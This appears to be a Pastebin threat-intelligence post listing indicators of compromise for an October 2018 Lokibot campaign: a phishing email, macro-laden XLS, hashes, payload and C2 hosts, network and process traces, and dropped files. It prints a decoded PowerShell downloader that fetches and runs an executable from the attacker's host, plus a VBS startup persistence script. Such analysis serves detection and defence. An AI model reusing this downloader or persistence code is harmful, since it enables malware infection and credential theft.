SHARE
TWEET

#Lokibot_161018

VRad Oct 17th, 2018 (edited) 929 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #Lokibot #X97M #macro #powershell
  2.  
  3. https://pastebin.com/LPqjHUkQ
  4. FAQ:
  5. https://radetskiy.wordpress.com/?s=lokibot
  6.  
  7. attack_vector
  8. --------------
  9. email > attach XLS > VBA > powershell > GET > %userprofile%\MyP8Mihuih.exe
  10.  
  11. email_headers
  12. --------------
  13. Received: from gunimo.com ([159.65.179.93])
  14.     by mailsrv2.victim1.com (8.15.2/8.15.2) with ESMTP id w9GDZxoi074233
  15.     for <user0@org2.victim1.com>; Tue, 16 Oct 2018 16:35:59 +0300 (EEST)
  16.     (envelope-from replymail202@gmail.com)
  17. Received: from [103.99.1.148] (helo=User)
  18.     by gunimo.com with esmtpa (Exim 4.84_2)
  19.     (envelope-from <replymail202@gmail.com>)
  20.     id 1gCPVH-00082K-4q; Tue, 16 Oct 2018 13:35:24 +0000
  21. Reply-To: <replymail202@gmail.com>
  22. From: "FREDRICK (BESTLABS)"<replymail202@gmail.com>
  23. Subject: Purchase Order (BESTLABS)
  24. Date: Tue, 16 Oct 2018 06:35:11 -0700
  25.  
  26. email_subjects
  27. --------------
  28. Purchase Order (BESTLABS)
  29.  
  30. files
  31. --------------
  32. SHA-256 a0735fd6ae06e59370e2702bdfda81f90d9b2489f3a483104469a0f4c596d552
  33. File name   87041166.xls
  34. File size   61 KB
  35.  
  36. SHA-256 078028b6a99daeb8576b1c33073732b0b65bd6c4eddcc2b061fdadf037e9063c
  37. File name   chri1.jpg   This program must be run under Win32
  38. File size   661 KB
  39.  
  40. activity
  41. **************
  42.  
  43. payload
  44. 181.174.165.161 http://octap{.} igg{.} biz/01/chri1.jpg
  45. C2
  46. 103.109.184.60 http://octone{.} igg{.} biz/chri1/cgi.php
  47.  
  48. netwrk
  49. --------------
  50. 181.174.165.161 octap{.} igg{.} biz GET /01/chri1.jpg HTTP/1.1  (!) no User Agent
  51. 103.109.184.60  octone{.} igg{.} biz    POST /chri1/cgi.php HTTP/1.0    (!) Mozilla/4.08 (Charon; Inferno) < #Lokibot User Agent
  52.  
  53. comp
  54. --------------
  55. powershell.exe      1148    181.174.165.161 80  ESTABLISHED                                    
  56. [System Process]    0   103.109.184.60  80  TIME_WAIT
  57. [System Process]    0   103.109.184.60  80  TIME_WAIT
  58. iigyhe.exe      2364    103.109.184.60  80  ESTABLISHED    
  59.  
  60.  
  61. proc
  62. --------------
  63. "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e\
  64. C:\Windows\SysWOW64\cMD.exe cMD & /C PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAARAAzAG8AQgBYAGQASABiAHMANwA4AH...
  65. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowErSHeLl  -En ZgB1AG4AYwB0AGkAbwBuACAARAAzAG8AQgBYAGQASABiAHMANwA4AH...
  66. "C:\Users\operator\MyP8Mihuih.exe"
  67. "C:\Users\operator\AppData\Roaming\iihge\iigyhe.exe"
  68. "C:\Users\operator\AppData\Roaming\iihge\iigyhe.exe"
  69.  
  70. base64_decode
  71. ---------------
  72. function D3oBXdHbs78ytXnPChs ( $NESUp2oGBWEZeslGaAmpDeDWO , $zZLx5PqAyovtf8HsUEDmfbEGOL )
  73. {(New-Object System.Net.WebClient).DownloadFile( $NESUp2oGBWEZeslGaAmpDeDWO , $zZLx5PqAyovtf8HsUEDmfbEGOL );
  74. (New-Object -com Shell.Application).ShellExecute( $zZLx5PqAyovtf8HsUEDmfbEGOL ); }
  75. try{
  76. $mVLKMABGL2alewvZd2=$env:USERPROFILE+'\MyP8Mihuih.exe';
  77. D3oBXdHbs78ytXnPChs 'http://octap{.} igg{.} biz/01/chri1.jpg' $mVLKMABGL2alewvZd2;
  78. }catch{}
  79.  
  80. persist
  81. --------------
  82. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup             17.10.2018 17:03   
  83. iihge.vbs           c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\iihge.vbs   17.10.2018 17:03   
  84.  
  85. vbs
  86. --------------
  87. Set qqRtjAUYnqWIRiSE = CreateOBject("wScriPt.sheLl")
  88. qQrTjAUyNQwIRise.rUn """C:\Users\operator\AppData\Roaming\iihge\iigyhe.exe"""
  89.  
  90. drop
  91. --------------
  92. C:\Users\operator\MyP8Mihuih.exe
  93. C:\Users\operator\AppData\Roaming\39B01F
  94. C:\Users\operator\AppData\Roaming\39B01F\FA74A3.exe
  95. C:\Users\operator\AppData\Roaming\39B01F\FA74A3.hdb
  96. C:\Users\operator\AppData\Roaming\iihge
  97.  
  98. # # #
  99. https://www.virustotal.com/#/file/a0735fd6ae06e59370e2702bdfda81f90d9b2489f3a483104469a0f4c596d552/details
  100. https://www.virustotal.com/#/file/078028b6a99daeb8576b1c33073732b0b65bd6c4eddcc2b061fdadf037e9063c/details
  101. https://analyze.intezer.com/#/analyses/a8e828da-f1f2-4817-ad4d-4c004486deb4
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top